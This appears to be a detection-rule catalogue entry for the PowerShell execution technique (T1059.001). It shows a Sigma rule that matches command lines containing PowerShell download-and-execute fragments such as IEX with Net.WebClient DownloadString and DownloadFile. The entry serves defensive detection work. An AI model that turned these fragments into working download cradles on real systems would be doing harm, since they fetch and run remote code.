software installers that pull packages from remote systems and execute them

t1059
t1059.001
windows
sigma

Techniques

t1059
t1059.001

Sample rules

Suspicious PowerShell Download and Execute Pattern

source: sigma
technicques:
- t1059
- t1059.001

Description

Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)

Detection logic

condition: selection
selection:
  CommandLine|contains:
  - IEX ((New-Object Net.WebClient).DownloadString
  - IEX (New-Object Net.WebClient).DownloadString
  - IEX((New-Object Net.WebClient).DownloadString
  - IEX(New-Object Net.WebClient).DownloadString
  - ' -command (New-Object System.Net.WebClient).DownloadFile('
  - ' -c (New-Object System.Net.WebClient).DownloadFile('